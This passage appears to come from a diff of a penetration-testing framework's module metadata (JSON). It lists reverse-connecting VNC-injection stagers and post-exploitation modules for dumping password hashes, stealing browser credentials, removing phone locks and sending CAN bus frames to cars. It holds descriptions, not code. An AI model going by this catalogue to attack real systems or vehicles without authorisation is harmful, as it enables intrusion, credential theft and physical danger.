- "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/vncinject/reverse_https": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/vncinject/reverse_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/vncinject/reverse_tcp_rc4": { - "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/vncinject/reverse_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/vncinject/reverse_winhttp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/vncinject/reverse_winhttps": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "post_aix/hashdump": { - "name": "AIX Gather Dump Password Hashes", - "fullname": "post/aix/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "Post module to dump the password hashes for all users on an AIX system.", - "references": [], - "platform": "AIX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-26 16:28:15 +0000", - "path": "/modules/post/aix/hashdump.rb", - "is_install_path": true, - "ref_name": "aix/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/capture/screen": { - "name": "Android Screen Capture", - "fullname": "post/android/capture/screen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module takes a screenshot of the target phone.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/capture/screen.rb", - "is_install_path": true, - "ref_name": "android/capture/screen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/hashdump": { - "name": "Android Gather Dump Password Hashes for Android Systems", - "fullname": "post/android/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "timwr" - ], - "description": "Post Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.", - "references": [ - "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/", - "URL-https://hashcat.net/forum/thread-2202.html" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "android/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/sub_info": { - "name": "Extract Subscriber Info", - "fullname": "post/android/gather/sub_info", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus" - ], - "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like IMEI, etc.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/sub_info.rb", - "is_install_path": true, - "ref_name": "android/gather/sub_info", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/gather/wireless_ap": { - "name": "Gather Wireless SSIDs and PSKs", - "fullname": "post/android/gather/wireless_ap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus", - "timwr" - ], - "description": "This module displays all wireless AP creds saved on the target device.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/gather/wireless_ap.rb", - "is_install_path": true, - "ref_name": "android/gather/wireless_ap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/local/koffee": { - "name": "KOFFEE - Kia OFFensivE Exploit", - "fullname": "post/android/local/koffee", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-12-02", - "type": "post", - "author": [ - "Gianpiero Costantino", - "Ilaria Matteucci" - ], - "description": "This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to\n attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on\n SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an\n active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head\n unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.", - "references": [ - "CVE-2020-8539", - "URL-https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/android/local/koffee.rb", - "is_install_path": true, - "ref_name": "android/local/koffee", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects", - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CAMERA_REVERSE_OFF", - "description": "It hides the parking camera video stream" - }, - { - "name": "CAMERA_REVERSE_ON", - "description": "It shows the parking camera video stream" - }, - { - "name": "CLUSTER_CHANGE_LANGUAGE", - "description": "It changes the cluster language" - }, - { - "name": "CLUSTER_RADIO_INFO", - "description": "It shows radio info in the instrument cluster " - }, - { - "name": "CLUSTER_RANDOM_NAVIGATION", - "description": "It shows navigation signals in the instrument cluster " - }, - { - "name": "CLUSTER_ROUNDABOUT_FARAWAY", - "description": "It shows a round about signal with variable distance in the instrument cluster " - }, - { - "name": "CLUSTER_SPEED_LIMIT", - "description": "It changes the speed limit shown in the instrument cluster" - }, - { - "name": "HIGH_SCREEN_BRIGHTNESS", - "description": "It increases the head unit screen brightness" - }, - { - "name": "INJECT_CUSTOM", - "description": "It injects custom micom payloads" - }, - { - "name": "LOW_FUEL_WARNING", - "description": "It pops up a low fuel message on the head unit" - }, - { - "name": "LOW_SCREEN_BRIGHTNESS", - "description": "It decreases the head unit screen brightness" - }, - { - "name": "MAX_RADIO_VOLUME", - "description": "It sets the radio volume to the max" - }, - { - "name": "NAVIGATION_FULL_SCREEN", - "description": "It pops up the navigation app window" - }, - { - "name": "REDUCE_RADIO_VOLUME", - "description": "It decreases the radio volume" - }, - { - "name": "SEEK_DOWN_SEARCH", - "description": "It triggers the seek down radio frequency search" - }, - { - "name": "SEEK_UP_SEARCH", - "description": "It triggers the seek up radio frequency search" - }, - { - "name": "SET_NAVIGATION_ADDRESS", - "description": "It pops up the navigation address window" - }, - { - "name": "SWITCH_OFF_HU", - "description": "It switches off the head unit" - }, - { - "name": "SWITCH_ON_HU", - "description": "It switches on the head unit" - }, - { - "name": "TOGGLE_RADIO_MUTE", - "description": "It mutes/umutes the radio" - } - ] - }, - "post_android/manage/remove_lock": { - "name": "Android Settings Remove Device Locks (4.0-4.3)", - "fullname": "post/android/manage/remove_lock", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-11", - "type": "post", - "author": [ - "CureSec", - "timwr" - ], - "description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.", - "references": [ - "CVE-2013-6271", - "URL-http://blog.curesec.com/article/blog/26.html", - "URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf" - ], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/manage/remove_lock.rb", - "is_install_path": true, - "ref_name": "android/manage/remove_lock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_android/manage/remove_lock_root": { - "name": "Android Root Remove Device Locks (root)", - "fullname": "post/android/manage/remove_lock_root", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "timwr" - ], - "description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.", - "references": [], - "platform": "Android", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 01:56:49 +0000", - "path": "/modules/post/android/manage/remove_lock_root.rb", - "is_install_path": true, - "ref_name": "android/manage/remove_lock_root", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_apple_ios/gather/ios_image_gather": { - "name": "iOS Image Gatherer", - "fullname": "post/apple_ios/gather/ios_image_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shelby Pace" - ], - "description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.", - "references": [], - "platform": "Apple_iOS", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:31:19 +0000", - "path": "/modules/post/apple_ios/gather/ios_image_gather.rb", - "is_install_path": true, - "ref_name": "apple_ios/gather/ios_image_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_apple_ios/gather/ios_text_gather": { - "name": "iOS Text Gatherer", - "fullname": "post/apple_ios/gather/ios_text_gather", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shelby Pace" - ], - "description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.", - "references": [], - "platform": "Apple_iOS", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:31:19 +0000", - "path": "/modules/post/apple_ios/gather/ios_text_gather.rb", - "is_install_path": true, - "ref_name": "apple_ios/gather/ios_text_gather", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_bsd/gather/hashdump": { - "name": "BSD Dump Password Hashes", - "fullname": "post/bsd/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "Post module to dump the password hashes for all users on a BSD system.", - "references": [], - "platform": "BSD", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 02:09:41 +0000", - "path": "/modules/post/bsd/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "bsd/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/cookies": { - "name": "Firefox Gather Cookies from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/cookies", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-26", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows collection of cookies from a Firefox Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/cookies.rb", - "is_install_path": true, - "ref_name": "firefox/gather/cookies", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/history": { - "name": "Firefox Gather History from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/history", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-11", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows collection of the entire browser history from a Firefox\n Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/history.rb", - "is_install_path": true, - "ref_name": "firefox/gather/history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/passwords": { - "name": "Firefox Gather Passwords from Privileged JavaScript Shell", - "fullname": "post/firefox/gather/passwords", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-11", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows collection of passwords from a Firefox Privileged JavaScript Shell.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 21:39:18 +0000", - "path": "/modules/post/firefox/gather/passwords.rb", - "is_install_path": true, - "ref_name": "firefox/gather/passwords", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/gather/xss": { - "name": "Firefox XSS", - "fullname": "post/firefox/gather/xss", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.", - "references": [], - "platform": "Firefox", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/firefox/gather/xss.rb", - "is_install_path": true, - "ref_name": "firefox/gather/xss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_firefox/manage/webcam_chat": { - "name": "Firefox Webcam Chat on Privileged JavaScript Shell", - "fullname": "post/firefox/manage/webcam_chat", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-13", - "type": "post", - "author": [ - "joev " - ], - "description": "This module allows streaming a webcam from a privileged Firefox JavaScript shell.", - "references": [ - "URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 12:21:55 +0000", - "path": "/modules/post/firefox/manage/webcam_chat.rb", - "is_install_path": true, - "ref_name": "firefox/manage/webcam_chat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/can_flood": { - "name": "CAN Flood", - "fullname": "post/hardware/automotive/can_flood", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Pietro Biondi" - ], - "description": "This module floods a CAN interface with supplied frames.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/can_flood.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/can_flood", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/canprobe": { - "name": "Module to Probe Different Data Points in a CAN Packet", - "fullname": "post/hardware/automotive/canprobe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/canprobe.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/canprobe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/diagnostic_state": { - "name": "Diagnostic State", - "fullname": "post/hardware/automotive/diagnostic_state", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/diagnostic_state.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/diagnostic_state", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/ecu_hard_reset": { - "name": "ECU Hard Reset", - "fullname": "post/hardware/automotive/ecu_hard_reset", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module performs hard reset in the ECU Reset Service Identifier (0x11).", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/ecu_hard_reset.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/ecu_hard_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/getvinfo": { - "name": "Get the Vehicle Information Such as the VIN from the Target Module", - "fullname": "post/hardware/automotive/getvinfo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "This module queries DTCs, some common engine info, and vehicle information.\n\n It returns such things as engine speed, coolant temp, Diagnostic Trouble\n Codes, as well as all info stored by Mode $09 Vehicle Info, VIN, etc.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/getvinfo.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/getvinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/identifymodules": { - "name": "Scan CAN Bus for Diagnostic Modules", - "fullname": "post/hardware/automotive/identifymodules", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Scan the CAN bus for any modules that can respond to UDS DSC queries.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/identifymodules.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/identifymodules", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/malibu_overheat": { - "name": "Sample Module to Flood Temp Gauge on 2006 Malibu", - "fullname": "post/hardware/automotive/malibu_overheat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Simple sample temp flood for the 2006 Malibu.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/malibu_overheat.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/malibu_overheat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/mazda_ic_mover": { - "name": "Mazda 2 Instrument Cluster Accelorometer Mover", - "fullname": "post/hardware/automotive/mazda_ic_mover", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jay Turla" - ], - "description": "This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster.", - "references": [], - "platform": 